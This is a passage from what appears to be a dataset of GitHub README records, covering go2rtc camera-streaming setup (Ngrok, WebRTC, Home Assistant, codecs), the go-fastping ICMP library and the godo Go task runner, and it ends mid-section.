can use same 8555 port or any other as the external port)\n- add `stun` word and external port to YAML config\n - go2rtc automatically detects your external address with STUN-server\n\n```yaml\nwebrtc:\n candidates:\n - stun:8555 # if you have dynamic public IP-address\n```\n\n**Private IP**\n\n- setup integration with [Ngrok service](#module-ngrok)\n\n```yaml\nngrok:\n command: ...\n```\n\n**Hard tech way 1. Own TCP-tunnel**\n\nIf you have personal [VPS](https://en.wikipedia.org/wiki/Virtual_private_server), you can create TCP-tunnel and setup in the same way as \"Static public IP\". But use your VPS IP-address in YAML config.\n\n**Hard tech way 2. Using TURN-server**\n\nIf you have personal [VPS](https://en.wikipedia.org/wiki/Virtual_private_server), you can install TURN server (e.g. [coturn](https://github.com/coturn/coturn), config [example](https://github.com/AlexxIT/WebRTC/wiki/Coturn-Example)).\n\n```yaml\nwebrtc:\n ice_servers:\n - urls: [stun:stun.l.google.com:19302]\n - urls: [turn:123.123.123.123:3478]\n username: your_user\n credential: your_pass\n```\n\n### Module: Ngrok\n\nWith Ngrok integration you can get external access to your streams in situation when you have Internet with private IP-address.\n\n- Ngrok preistalled for **Docker** and **Hass Add-on** users\n- you may need external access for two different things:\n - WebRTC stream, so you need tunnel WebRTC TCP port (ex. 8555)\n - go2rtc web interface, so you need tunnel API HTTP port (ex. 
1984)\n- Ngrok support authorization for your web interface\n- Ngrok automatically adds HTTPS to your web interface\n\nNgrok free subscription limitations:\n\n- you will always get random external address (not a problem for webrtc stream)\n- you can forward multiple ports but use only one Ngrok app\n\ngo2rtc will automatically get your external TCP address (if you enable it in ngrok config) and use it with WebRTC connection (if you enable it in webrtc config).\n\nYou need manually download [Ngrok agent app](https://ngrok.com/download) for your OS and register in [Ngrok service](https://ngrok.com/).\n\n**Tunnel for only WebRTC Stream**\n\nYou need to add your [Ngrok token](https://dashboard.ngrok.com/get-started/your-authtoken) and WebRTC TCP port to YAML:\n\n```yaml\nngrok:\n command: ngrok tcp 8555 --authtoken eW91IHNoYWxsIG5vdCBwYXNzCnlvdSBzaGFsbCBub3QgcGFzcw\n```\n\n**Tunnel for WebRTC and Web interface**\n\nYou need to create `ngrok.yaml` config file and add it to go2rtc config:\n\n```yaml\nngrok:\n command: ngrok start --all --config ngrok.yaml\n```\n\nNgrok config example:\n\n```yaml\nversion: \"2\"\nauthtoken: eW91IHNoYWxsIG5vdCBwYXNzCnlvdSBzaGFsbCBub3QgcGFzcw\ntunnels:\n api:\n addr: 1984 # use the same port as in go2rtc config\n proto: http\n basic_auth:\n - admin:password # you can set login/pass for your web interface\n webrtc:\n addr: 8555 # use the same port as in go2rtc config\n proto: tcp\n```\n\n### Module: Hass\n\nThe best and easiest way to use go2rtc inside the Home Assistant is to install the custom integration [WebRTC Camera](#go2rtc-home-assistant-integration) and custom lovelace card.\n\nBut go2rtc is also compatible and can be used with [RTSPtoWebRTC](https://www.home-assistant.io/integrations/rtsp_to_webrtc/) built-in integration.\n\nYou have several options on how to add a camera to Home Assistant:\n\n1. Camera RTSP source => [Generic Camera](https://www.home-assistant.io/integrations/generic/)\n2. Camera [any source](#module-streams) => [go2rtc config](#configuration) => [Generic Camera](https://www.home-assistant.io/integrations/generic/)\n - Install any [go2rtc](#fast-start)\n - Add your stream to [go2rtc config](#configuration)\n - Hass > Settings > Integrations > Add Integration > [Generic Camera](https://my.home-assistant.io/redirect/config_flow_start/?domain=generic) > `rtsp://127.0.0.1:8554/camera1` (change to your stream name)\n\nYou have several options on how to watch the stream from the cameras in Home Assistant:\n\n1. `Camera Entity` => `Picture Entity Card` => Technology `HLS`, codecs: `H264/H265/AAC`, poor latency.\n2. `Camera Entity` => [RTSPtoWebRTC](https://www.home-assistant.io/integrations/rtsp_to_webrtc/) => `Picture Entity Card` => Technology `WebRTC`, codecs: `H264/PCMU/PCMA/OPUS`, best latency.\n - Install any [go2rtc](#fast-start)\n - Hass > Settings > Integrations > Add Integration > [RTSPtoWebRTC](https://my.home-assistant.io/redirect/config_flow_start/?domain=rtsp_to_webrtc) > `http://127.0.0.1:1984/`\n - RTSPtoWebRTC > Configure > STUN server: `stun.l.google.com:19302`\n - Use Picture Entity or Picture Glance lovelace card\n3. 
`Camera Entity` or `Camera URL` => [WebRTC Camera](https://github.com/AlexxIT/WebRTC) => Technology: `WebRTC/MSE/MP4/MJPEG`, codecs: `H264/H265/AAC/PCMU/PCMA/OPUS`, best latency, best compatibility.\n - Install and add [WebRTC Camera](https://github.com/AlexxIT/WebRTC) custom integration\n - Use WebRTC Camera custom lovelace card\n\nYou can add camera `entity_id` to [go2rtc config](#configuration) if you need transcoding:\n\n```yaml\nstreams:\n \"camera.hall\": ffmpeg:{input}#video=copy#audio=opus\n```\n\nPS. Default Home Assistant lovelace cards don't support 2-way audio. You can use 2-way audio from [Add-on Web UI](https://my.home-assistant.io/redirect/supervisor_addon/?addon=a889bffc_go2rtc&repository_url=https%3A%2F%2Fgithub.com%2FAlexxIT%2Fhassio-addons). But you need use HTTPS to access the microphone. This is a browser restriction and cannot be avoided.\n\n### Module: MP4\n\nProvides several features:\n\n1. MSE stream (fMP4 over WebSocket)\n2. Camera snapshots in MP4 format (single frame), can be sent to [Telegram](https://github.com/AlexxIT/go2rtc/wiki/Snapshot-to-Telegram)\n3. MP4 \"file stream\" - bad format for streaming because of high start delay. This format doesn't work in all Safari browsers, but go2rtc will automatically redirect it to HLS/fMP4 it this case.\n\nAPI examples:\n\n- MP4 stream: `http://192.168.1.123:1984/api/stream.mp4?src=camera1`\n- MP4 snapshot: `http://192.168.1.123:1984/api/frame.mp4?src=camera1`\n\nRead more about [codecs filters](#codecs-filters).\n\n### Module: HLS\n\n[HLS](https://en.wikipedia.org/wiki/HTTP_Live_Streaming) is the worst technology for real-time streaming. It can only be useful on devices that do not support more modern technology, like [WebRTC](#module-webrtc), [MSE/MP4](#module-mp4).\n\nThe go2rtc implementation differs from the standards and may not work with all players.\n\nAPI examples:\n\n- HLS/TS stream: `http://192.168.1.123:1984/api/stream.m3u8?src=camera1` (H264)\n- HLS/fMP4 stream: `http://192.168.1.123:1984/api/stream.m3u8?src=camera1&mp4` (H264, H265, AAC)\n\nRead more about [codecs filters](#codecs-filters).\n\n### Module: MJPEG\n\n**Important.** For stream as MJPEG format, your source MUST contain the MJPEG codec. If your stream has a MJPEG codec - you can receive **MJPEG stream** or **JPEG snapshots** via API.\n\nYou can receive an MJPEG stream in several ways:\n\n- some cameras support MJPEG codec inside [RTSP stream](#source-rtsp) (ex. second stream for Dahua cameras)\n- some cameras has HTTP link with [MJPEG stream](#source-http)\n- some cameras has HTTP link with snapshots - go2rtc can convert them to [MJPEG stream](#source-http)\n- you can convert H264/H265 stream from your camera via [FFmpeg integraion](#source-ffmpeg)\n\nWith this example, your stream will have both H264 and MJPEG codecs:\n\n```yaml\nstreams:\n camera1:\n - rtsp://rtsp:12345678@192.168.1.123/av_stream/ch0\n - ffmpeg:camera1#video=mjpeg\n```\n\nAPI examples:\n\n- MJPEG stream: `http://192.168.1.123:1984/api/stream.mjpeg?src=camera1`\n- JPEG snapshots: `http://192.168.1.123:1984/api/frame.jpeg?src=camera1`\n\n### Module: Log\n\nYou can set different log levels for different modules.\n\n```yaml\nlog:\n level: info # default level\n api: trace\n exec: debug\n ngrok: info\n rtsp: warn\n streams: error\n webrtc: fatal\n```\n\n## Security\n\nBy default `go2rtc` starts the Web interface on port `1984` and RTSP on port `8554`, as well as use port `8555` for WebRTC connections. The three ports are accessible from your local network. 
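To make the snapshot endpoints above concrete, here is a hedged Go sketch that saves a single JPEG frame to disk; the IP and stream name reuse the example values, and the stream must already contain an MJPEG codec as explained in the MJPEG module:

```go
// snapshot.go - hedged sketch using the JPEG snapshot endpoint listed above.
// It downloads one frame from "camera1" and writes it to camera1.jpg.
package main

import (
	"io"
	"log"
	"net/http"
	"os"
)

func main() {
	resp, err := http.Get("http://192.168.1.123:1984/api/frame.jpeg?src=camera1")
	if err != nil {
		log.Fatal(err)
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		log.Fatalf("unexpected status: %s", resp.Status)
	}

	out, err := os.Create("camera1.jpg")
	if err != nil {
		log.Fatal(err)
	}
	defer out.Close()

	if _, err := io.Copy(out, resp.Body); err != nil {
		log.Fatal(err)
	}
	log.Println("snapshot saved to camera1.jpg")
}
```

Keep in mind that, by default, these HTTP endpoints answer to any machine on the local network.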
So anyone on your local network can watch video from your cameras without authorization. The same rule applies to the Home Assistant Add-on.\n\nThis is not a problem if you trust your local network as much as I do. But you can change this behaviour with a `go2rtc.yaml` config:\n\n```yaml\napi:\n listen: \"127.0.0.1:1984\" # localhost\n\nrtsp:\n listen: \"127.0.0.1:8554\" # localhost\n\nwebrtc:\n listen: \":8555\" # external TCP/UDP port\n```\n\n- local access to RTSP is not a problem for [FFmpeg](#source-ffmpeg) integration, because it runs locally on your server\n- local access to API is not a problem for [Home Assistant Add-on](#go2rtc-home-assistant-add-on), because Hass runs locally on same server and Add-on Web UI protected with Hass authorization ([Ingress feature](https://www.home-assistant.io/blog/2019/04/15/hassio-ingress/))\n- external access to WebRTC TCP port is not a problem, because it used only for transmit encrypted media data\n - anyway you need to open this port to your local network and to the Internet in order for WebRTC to work\n\nIf you need Web interface protection without Home Assistant Add-on - you need to use reverse proxy, like [Nginx](https://nginx.org/), [Caddy](https://caddyserver.com/), [Ngrok](https://ngrok.com/), etc.\n\nPS. Additionally WebRTC will try to use the 8555 UDP port for transmit encrypted media. It works without problems on the local network. And sometimes also works for external access, even if you haven't opened this port on your router ([read more](https://en.wikipedia.org/wiki/UDP_hole_punching)). But for stable external WebRTC access, you need to open the 8555 port on your router for both TCP and UDP.\n\n## Codecs filters\n\ngo2rtc can automatically detect which codecs your device supports for [WebRTC](#module-webrtc) and [MSE](#module-mp4) technologies.\n\nBut it cannot be done for [RTSP](#module-rtsp), [stream.mp4](#module-mp4), [HLS](#module-hls) technologies. You can manually add a codec filter when you create a link to a stream. The filters work the same for all three technologies. Filters do not create a new codec. They only select the suitable codec from existing sources. You can add new codecs to the stream using the [FFmpeg transcoding](#source-ffmpeg).\n\nWithout filters:\n\n- RTSP will provide only the first video and only the first audio\n- MP4 will include only compatible codecs (H264, H265, AAC)\n- HLS will output in the legacy TS format (H264 without audio)\n\nSome examples:\n\n- `rtsp://192.168.1.123:8554/camera1?mp4` - useful for recording as MP4 files (e.g. Hass or Frigate)\n- `rtsp://192.168.1.123:8554/camera1?video=h264,h265&audio=aac` - full version of the filter above\n- `rtsp://192.168.1.123:8554/camera1?video=h264&audio=aac&audio=opus` - H264 video codec and two separate audio tracks\n- `rtsp://192.168.1.123:8554/camera1?video&audio=all` - any video codec and all audio codecs as separate tracks\n- `http://192.168.1.123:1984/api/stream.m3u8?src=camera1&mp4` - HLS stream with MP4 compatible codecs (HLS/fMP4)\n- `http://192.168.1.123:1984/api/stream.mp4?src=camera1&video=h264,h265&audio=aac,opus,mp3,pcma,pcmu` - MP4 file with non standard audio codecs, does not work in some players\n\n## Codecs madness\n\n`AVC/H.264` video can be played almost anywhere. But `HEVC/H.265` has a lot of limitations in supporting with different devices and browsers. 
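On the reverse-proxy recommendation from the Security section above: Nginx, Caddy or Ngrok are the usual choices, but purely as an illustration of the idea, a minimal Go gate with Basic auth might look like this (credentials and the listen port are placeholders):

```go
// authproxy.go - hedged sketch of putting a reverse proxy with Basic auth
// in front of a go2rtc web UI that listens only on 127.0.0.1:1984.
package main

import (
	"crypto/subtle"
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
)

func main() {
	target, err := url.Parse("http://127.0.0.1:1984") // go2rtc api listen address
	if err != nil {
		log.Fatal(err)
	}
	proxy := httputil.NewSingleHostReverseProxy(target)

	handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		user, pass, ok := r.BasicAuth()
		// Placeholder credentials - load real ones from a secret store.
		if !ok ||
			subtle.ConstantTimeCompare([]byte(user), []byte("admin")) != 1 ||
			subtle.ConstantTimeCompare([]byte(pass), []byte("secret")) != 1 {
			w.Header().Set("WWW-Authenticate", `Basic realm="go2rtc"`)
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		proxy.ServeHTTP(w, r)
	})

	// Arbitrary external port for the sketch.
	log.Fatal(http.ListenAndServe(":8080", handler))
}
```

As for why H.265 support is so patchy across devices: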
It's all about patents and money, you can't do anything about it.\n\n| Device | WebRTC | MSE | stream.mp4 |\n|---------------------|-------------------------------|------------------------|-----------------------------------------|\n| *latency* | best | medium | bad |\n| Desktop Chrome 107+ | H264, OPUS, PCMU, PCMA | H264, H265*, AAC, OPUS | H264, H265*, AAC, OPUS, PCMU, PCMA, MP3 |\n| Desktop Edge | H264, OPUS, PCMU, PCMA | H264, H265*, AAC, OPUS | H264, H265*, AAC, OPUS, PCMU, PCMA, MP3 |\n| Desktop Safari | H264, H265*, OPUS, PCMU, PCMA | H264, H265, AAC | **no!** |\n| Desktop Firefox | H264, OPUS, PCMU, PCMA | H264, AAC, OPUS | H264, AAC, OPUS |\n| Android Chrome 107+ | H264, OPUS, PCMU, PCMA | H264, H265*, AAC, OPUS | H264, ?, AAC, OPUS, PCMU, PCMA, MP3 |\n| iPad Safari 13+ | H264, H265*, OPUS, PCMU, PCMA | H264, H265, AAC | **no!** |\n| iPhone Safari 13+ | H264, H265*, OPUS, PCMU, PCMA | **no!** | **no!** |\n| masOS Hass App | no | no | no |\n\n- Chrome H265: [read this](https://chromestatus.com/feature/5186511939567616) and [read this](https://github.com/StaZhu/enable-chromium-hevc-hardware-decoding)\n- Edge H265: [read this](https://www.reddit.com/r/MicrosoftEdge/comments/v9iw8k/enable_hevc_support_in_edge/)\n- Desktop Safari H265: Menu > Develop > Experimental > WebRTC H265\n- iOS Safari H265: Settings > Safari > Advanced > Experimental > WebRTC H265\n\n**Audio**\n\n- **WebRTC** audio codecs: `PCMU/8000`, `PCMA/8000`, `OPUS/48000/2`\n- `OPUS` and `MP3` inside **MP4** is part of the standard, but some players do not support them anyway (especially Apple)\n- `PCMU` and `PCMA` inside **MP4** isn't a standard, but some players support them, for example Chromium browsers\n\n**Apple devices**\n\n- all Apple devices don't support MP4 stream (they only support progressive loading of static files)\n- iPhones don't support MSE technology because it competes with the HLS technology, invented by Apple\n- HLS is the worst technology for **live** streaming, it still exists only because of iPhones\n\n## Codecs negotiation\n\nFor example, you want to watch RTSP-stream from [Dahua IPC-K42](https://www.dahuasecurity.com/fr/products/All-Products/Network-Cameras/Wireless-Series/Wi-Fi-Series/4MP/IPC-K42) camera in your Chrome browser.\n\n- this camera support 2-way audio standard **ONVIF Profile T**\n- this camera support codecs **H264, H265** for send video, and you select `H264` in camera settings\n- this camera support codecs **AAC, PCMU, PCMA** for send audio (from mic), and you select `AAC/16000` in camera settings\n- this camera support codecs **AAC, PCMU, PCMA** for receive audio (to speaker), you don't need to select them\n- your browser support codecs **H264, VP8, VP9, AV1** for receive video, you don't need to select them\n- your browser support codecs **OPUS, PCMU, PCMA** for send and receive audio, you don't need to select them\n- you can't get camera audio directly, because its audio codecs doesn't match with your browser codecs\n - so you decide to use transcoding via FFmpeg and add this setting to config YAML file\n - you have chosen `OPUS/48000/2` codec, because it is higher quality than the `PCMU/8000` or `PCMA/8000`\n\nNow you have stream with two sources - **RTSP and FFmpeg**:\n\n```yaml\nstreams:\n dahua:\n - rtsp://admin:password@192.168.1.123/cam/realmonitor?channel=1&subtype=0&unicast=true&proto=Onvif\n - ffmpeg:rtsp://admin:password@192.168.1.123/cam/realmonitor?channel=1&subtype=0#audio=opus\n```\n\n**go2rtc** automatically match codecs for you browser and all your stream 
sources. This called **multi-source 2-way codecs negotiation**. And this is one of the main features of this app.\n\n![](assets/codecs.svg)\n\n**PS.** You can select `PCMU` or `PCMA` codec in camera setting and don't use transcoding at all. Or you can select `AAC` codec for main stream and `PCMU` codec for second stream and add both RTSP to YAML config, this also will work fine.\n\n## Projects using go2rtc\n\n- [Frigate 12+](https://frigate.video/) - open source NVR built around real-time AI object detection\n- [ring-mqtt](https://github.com/tsightler/ring-mqtt) - Ring devices to MQTT Bridge\n- [EufyP2PStream](https://github.com/oischinger/eufyp2pstream) - A small project that provides a Video/Audio Stream from Eufy cameras that don't directly support RTSP\n\n## Cameras experience\n\n- [Dahua](https://www.dahuasecurity.com/) - reference implementation streaming protocols, a lot of settings, high stream quality, multiple streaming clients\n- [Hikvision](https://www.hikvision.com/) - a lot of proprietary streaming technologies\n- [Reolink](https://reolink.com/) - some models has awful unusable RTSP realisation and not best HTTP-FLV alternative (I recommend that you contact Reolink support for new firmware), few settings\n- [Sonoff](https://sonoff.tech/) - very low stream quality, no settings, not best protocol implementation\n- [TP-Link](https://www.tp-link.com/) - few streaming clients, packet loss?\n- Chinese cheap noname cameras, Wyze Cams, Xiaomi cameras with hacks (usual has `/live/ch00_1` in RTSP URL) - awful but usable RTSP protocol realisation, low stream quality, few settings, packet loss?\n\n## TIPS\n\n**Using apps for low RTSP delay**\n\n- `ffplay -fflags nobuffer -flags low_delay \"rtsp://192.168.1.123:8554/camera1\"`\n- VLC > Preferences > Input / Codecs > Default Caching Level: Lowest Latency\n\n**Snapshots to Telegram**\n\n[read more](https://github.com/AlexxIT/go2rtc/wiki/Snapshot-to-Telegram)\n\n## FAQ\n\n**Q. What's the difference between go2rtc, WebRTC Camera and RTSPtoWebRTC?**\n\n**go2rtc** is a new version of the server-side [WebRTC Camera](https://github.com/AlexxIT/WebRTC) integration, completely rewritten from scratch, with a number of fixes and a huge number of new features. It is compatible with native Home Assistant [RTSPtoWebRTC](https://www.home-assistant.io/integrations/rtsp_to_webrtc/) integration. So you [can use](#module-hass) default lovelace Picture Entity or Picture Glance.\n\n**Q. Should I use go2rtc addon or WebRTC Camera integration?**\n\n**go2rtc** is more than just viewing your stream online with WebRTC/MSE/HLS/etc. You can use it all the time for your various tasks. But every time the Hass is rebooted - all integrations are also rebooted. So your streams may be interrupted if you use them in additional tasks.\n\nBasic users can use **WebRTC Camera** integration. Advanced users can use go2rtc addon or Frigate 12+ addon.\n\n**Q. Which RTSP link should I use inside Hass?**\n\nYou can use direct link to your cameras there (as you always do). **go2rtc** support zero-config feature. You may leave `streams` config section empty. And your streams will be created on the fly on first start from Hass. And your cameras will have multiple connections. Some from Hass directly and one from **go2rtc**.\n\nAlso you can specify your streams in **go2rtc** [config file](#configuration) and use RTSP links to this addon. With additional features: multi-source [codecs negotiation](#codecs-negotiation) or FFmpeg [transcoding](#source-ffmpeg) for unsupported codecs. 
Or use them as source for Frigate. And your cameras will have one connection from **go2rtc**. And **go2rtc** will have multiple connection - some from Hass via RTSP protocol, some from your browser via WebRTC/MSE/HLS protocols.\n\nUse any config what you like.\n\n**Q. What about lovelace card with support 2-way audio?**\n\nAt this moment I am focused on improving stability and adding new features to **go2rtc**. Maybe someone could write such a card themselves. It's not difficult, I have [some sketches](https://github.com/AlexxIT/go2rtc/blob/master/www/webrtc.html).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tatsushid/go-fastping", "link": "https://github.com/tatsushid/go-fastping", "tags": [], "stars": 535, "description": "ICMP ping library for Go inspired by AnyEvent::FastPing Perl module", "lang": "Go", "repo_lang": "", "readme": "go-fastping\n===========\n\ngo-fastping is a Go language ICMP ping library, inspired by the `AnyEvent::FastPing`\nPerl module, for quickly sending ICMP ECHO REQUEST packets. Original Perl module\nis available at http://search.cpan.org/~mlehmann/AnyEvent-FastPing-2.01/\n\nAll original functions haven't been implemented yet.\n\n[![GoDoc](https://godoc.org/github.com/tatsushid/go-fastping?status.svg)](https://godoc.org/github.com/tatsushid/go-fastping)\n\n## Installation\n\nInstall and update with `go get -u github.com/tatsushid/go-fastping`\n\n## Examples\n\nImport this package and write\n\n```go\np := fastping.NewPinger()\nra, err := net.ResolveIPAddr(\"ip4:icmp\", os.Args[1])\nif err != nil {\n\tfmt.Println(err)\n\tos.Exit(1)\n}\np.AddIPAddr(ra)\np.OnRecv = func(addr *net.IPAddr, rtt time.Duration) {\n\tfmt.Printf(\"IP Addr: %s receive, RTT: %v\\n\", addr.String(), rtt)\n}\np.OnIdle = func() {\n\tfmt.Println(\"finish\")\n}\nerr = p.Run()\nif err != nil {\n\tfmt.Println(err)\n}\n```\n\nThe example sends an ICMP packet and waits for a response. If it receives a\nresponse, it calls the \"receive\" callback. After that, once MaxRTT time has\npassed, it calls the \"idle\" callback. For more details,\nrefer [to the godoc][godoc], and if you need more examples,\nplease see \"cmd/ping/ping.go\".\n\n## Caution\nThis package implements ICMP ping using both raw socket and UDP. If your program\nuses this package in raw socket mode, it needs to be run as a root user.\n\n## License\ngo-fastping is under MIT License. 
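Building on the example above, here is a hedged sketch that pings several targets in one run; the hosts are placeholders, MaxRTT is the per-round timeout mentioned in the description, and raw socket mode still needs root as noted in the Caution section:

```go
// Hedged sketch: ping a few hosts at once with the API shown in the README example.
package main

import (
	"fmt"
	"net"
	"os"
	"time"

	fastping "github.com/tatsushid/go-fastping"
)

func main() {
	p := fastping.NewPinger()
	p.MaxRTT = time.Second // give each round up to 1s before OnIdle fires

	// Placeholder targets - replace with the hosts you actually care about.
	for _, host := range []string{"192.168.1.1", "example.com"} {
		ra, err := net.ResolveIPAddr("ip4:icmp", host)
		if err != nil {
			fmt.Println(err)
			os.Exit(1)
		}
		p.AddIPAddr(ra)
	}

	p.OnRecv = func(addr *net.IPAddr, rtt time.Duration) {
		fmt.Printf("IP Addr: %s receive, RTT: %v\n", addr.String(), rtt)
	}
	p.OnIdle = func() {
		fmt.Println("round finished")
	}

	if err := p.Run(); err != nil {
		fmt.Println(err)
	}
}
```

For the license text itself: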
See the [LICENSE][license] file for details.\n\n[godoc]: http://godoc.org/github.com/tatsushid/go-fastping\n[license]: https://github.com/tatsushid/go-fastping/blob/master/LICENSE\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "go-godo/godo", "link": "https://github.com/go-godo/godo", "tags": ["go", "task-runner", "build", "watcher"], "stars": 535, "description": "golang build tool in the spirt of rake, gulp", "lang": "Go", "repo_lang": "", "readme": "**Documentation is WIP**\n\n# godo\n\n[![GoDoc](https://godoc.org/github.com/go-godo/godo?status.svg)](https://godoc.org/github.com/go-godo/godo)\n\ngodo is a task runner and file watcher for golang in the spirit of\nrake, gulp.\n\nTo install\n\n go get -u gopkg.in/godo.v2/cmd/godo\n\n## Godofile\n\nGodo runs `Gododir/main.go`.\n\nAs an example, create a file **Gododir/main.go** with this content\n\n```go\npackage main\n\nimport (\n \"fmt\"\n do \"gopkg.in/godo.v2\"\n)\n\nfunc tasks(p *do.Project) {\n do.Env = `GOPATH=.vendor::$GOPATH`\n\n p.Task(\"default\", do.S{\"hello\", \"build\"}, nil)\n\n p.Task(\"hello\", nil, func(c *do.Context) {\n name := c.Args.AsString(\"name\", \"n\")\n if name == \"\" {\n c.Bash(\"echo Hello $USER!\")\n } else {\n fmt.Println(\"Hello\", name)\n }\n })\n\n p.Task(\"assets?\", nil, func(c *do.Context) {\n // The \"?\" tells Godo to run this task ONLY ONCE regardless of\n // how many tasks depend on it. In this case watchify watches\n // on its own.\n\t c.Run(\"watchify public/js/index.js d -o dist/js/app.bundle.js\")\n }).Src(\"public/**/*.{css,js,html}\")\n\n p.Task(\"build\", do.S{\"views\", \"assets\"}, func(c *do.Context) {\n c.Run(\"GOOS=linux GOARCH=amd64 go build\", do.M{\"$in\": \"cmd/server\"})\n }).Src(\"**/*.go\")\n\n p.Task(\"server\", do.S{\"views\", \"assets\"}, func(c *do.Context) {\n // rebuilds and restarts when a watched file changes\n c.Start(\"main.go\", do.M{\"$in\": \"cmd/server\"})\n }).Src(\"server/**/*.go\", \"cmd/server/*.{go,json}\").\n Debounce(3000)\n\n p.Task(\"views\", nil, func(c *do.Context) {\n c.Run(\"razor templates\")\n }).Src(\"templates/**/*.go.html\")\n}\n\nfunc main() {\n do.Godo(tasks)\n}\n```\n\nTo run \"server\" task from parent dir of `Gododir/`\n\n godo server\n\nTo rerun \"server\" and its dependencies whenever any of their watched files change\n\n godo server --watch\n\nTo run the \"default\" task which runs \"hello\" and \"build\"\n\n godo\n\nTask names may add a \"?\" suffix to execute only once even when watching\n\n```go\n// build once regardless of number of dependents\np.Task(\"assets?\", nil, func(*do.Context) { })\n```\n\nTask dependencies\n\n do.S{} or do.Series{} - dependent tasks to run in series\n do.P{} or do.Parallel{} - dependent tasks to run in parallel\n\n For example, do.S{\"clean\", do.P{\"stylesheets\", \"templates\"}, \"build\"}\n\n\n### Task Option Funcs\n\n* Task#Src() - specify watch paths or the src files for Task#Dest()\n\n Glob patterns\n\n /**/ - match zero or more directories\n {a,b} - match a or b, no spaces\n * - match any non-separator char\n ? - match a single non-separator char\n **/ - match any directory, start of pattern only\n /** - match any in this directory, end of pattern only\n ! 
- removes files from result set, start of pattern only\n\n* Task#Dest(globs ...string) - If globs in Src are newer than Dest, then\n the task is run\n\n* Task#Desc(description string) - Set task's description in usage.\n\n* Task#Debounce(duration time.Duration) - Disallow a task from running until duration\n has elapsed.\n\n* Task#Deps(names ...interface{}) - Can be `S, Series, P, Parallel, string`\n\n\n### Task CLI Arguments\n\nTask CLI arguments follow POSIX style flag convention\n(unlike go's built-in flag package). Any command line arguments\nsucceeding `--` are passed to each task. Note, arguments before `--`\nare reserved for `godo`.\n\nAs an example,\n\n```go\np.Task(\"hello\", nil, func(c *do.Context) {\n // \"(none)\" is the default value\n msg := c.Args.MayString(\"(none)\", \"message\", \"msg\", \"m\")\n var name string\n if len(c.Args.NonFlags()) == 1 {\n name = c.Args.NonFlags()[0]\n }\n fmt.Println(msg, name)\n})\n```\n\nrunning\n\n```sh\n# prints \"(none)\"\ngodo hello\n\n# prints \"Hello dude\" using POSIX style flags\ngodo hello -- dude --message Hello\ngodo hello -- dude --msg Hello\ngodo hello -- -m Hello dude\n```\n\nArgs functions are categorized as\n\n* `Must*` - Argument must be set by user or panic.\n\n ```go\nc.Args.MustInt(\"number\", \"n\")\n```\n\n* `May*` - If argument is not set, default to first value.\n\n ```go\n// defaults to 100\nc.Args.MayInt(100, \"number\", \"n\")\n```\n\n* `As*` - If argument is not set, default to zero value.\n\n ```go\n// defaults to 0\nc.Args.AsInt(\"number\", \"n\")\n```\n\n\n## Modularity and Namespaces\n\nA project may include other tasks functions with `Project#Use`. `Use` requires a namespace to\nprevent task name conflicts with existing tasks.\n\n```go\nfunc buildTasks(p *do.Project) {\n p.Task(\"default\", S{\"clean\"}, nil)\n\n p.Task(\"clean\", nil, func(*do.Context) {\n fmt.Println(\"build clean\")\n })\n}\n\nfunc tasks(p *do.Project) {\n p.Use(\"build\", buildTasks)\n\n p.Task(\"clean\", nil, func(*do.Context) {\n fmt.Println(\"root clean\")\n })\n\n p.Task(\"build\", do.S{\"build:default\"}, func(*do.Context) {\n fmt.Println(\"root clean\")\n })\n}\n```\n\nRunning `godo build:.` or `godo build` results in output of `build clean`. Note that\nit uses the `clean` task in its namespace not the `clean` in the parent project.\n\nThe special name `build:.` is alias for `build:default`.\n\nTask dependencies that start with `\"/\"` are relative to the parent project and\nmay be called referenced from sub projects.\n\n## godobin\n\n`godo` compiles `Godofile.go` to `godobin-VERSION` (`godobin-VERSION.exe` on Windows) whenever\n`Godofile.go` changes. The binary file is built into the same directory as\n`Godofile.go` and should be ignored by adding the path `godobin*` to `.gitignore`.\n\n## Exec functions\n\nAll of these functions accept a `map[string]interface{}` or `M` for\noptions. Option keys that start with `\"$\"` are reserved for `godo`.\nOther fields can be used as context for template.\n\n### Bash\n\nBash functions uses the bash executable and may not run on all OS.\n\nRun a bash script string. 
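Stepping back briefly to the Src/Dest option funcs described above, here is a hedged sketch of an incremental task that only runs when its sources are newer than its output; the paths and the minify command are placeholders:

```go
package main

import (
	do "gopkg.in/godo.v2"
)

func tasks(p *do.Project) {
	// "minify" is skipped when dist/js/app.min.js is newer than every Src match.
	p.Task("minify", nil, func(c *do.Context) {
		c.Run("uglifyjs public/js/app.js -o dist/js/app.min.js") // placeholder command
	}).Src("public/js/**/*.js").
		Dest("dist/js/app.min.js").
		Desc("rebuild the JS bundle only when sources change")
}

func main() {
	do.Godo(tasks)
}
```

Back to `Bash`: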
The script can be multiline with continuation.\n\n```go\nc.Bash(`\n echo -n $USER\n echo some really long \\\n command\n`)\n```\n\nBash can use Go templates\n\n```go\nc.Bash(`echo -n {{.name}}`, do.M{\"name\": \"mario\", \"$in\": \"cmd/bar\"})\n```\n\nRun a bash script and capture STDOUT and STDERR.\n\n```go\noutput, err := c.BashOutput(`echo -n $USER`)\n```\n\n### Run\n\nRun `go build` inside of cmd/app and set environment variables.\n\n```go\nc.Run(`GOOS=linux GOARCH=amd64 go build`, do.M{\"$in\": \"cmd/app\"})\n```\n\nRun can use Go templates\n\n```go\nc.Run(`echo -n {{.name}}`, do.M{\"name\": \"mario\", \"$in\": \"cmd/app\"})\n```\n\nRun and capture STDOUT and STDERR\n\n```go\noutput, err := c.RunOutput(\"whoami\")\n```\n\n### Start\n\nStart an async command. If the executable has the suffix \".go\" then it will be \"go install\"ed and then executed.\nUse this for watching a server task.\n\n```go\nc.Start(\"main.go\", do.M{\"$in\": \"cmd/app\"})\n```\n\nGodo tracks the process ID of started processes to restart the app gracefully.\n\n### Inside\n\nTo run many commands inside a directory, use `Inside` instead of the `$in` option.\n`Inside` changes the working directory.\n\n```go\ndo.Inside(\"somedir\", func() {\n do.Run(\"...\")\n do.Bash(\"...\")\n})\n```\n\n## User Input\n\nTo get a plain string\n\n```go\nuser := do.Prompt(\"user: \")\n```\n\nTo get a password\n\n```go\npassword := do.PromptPassword(\"password: \")\n```\n\n## Godofile Run-Time Environment\n\n### From command-line\n\nEnvironment 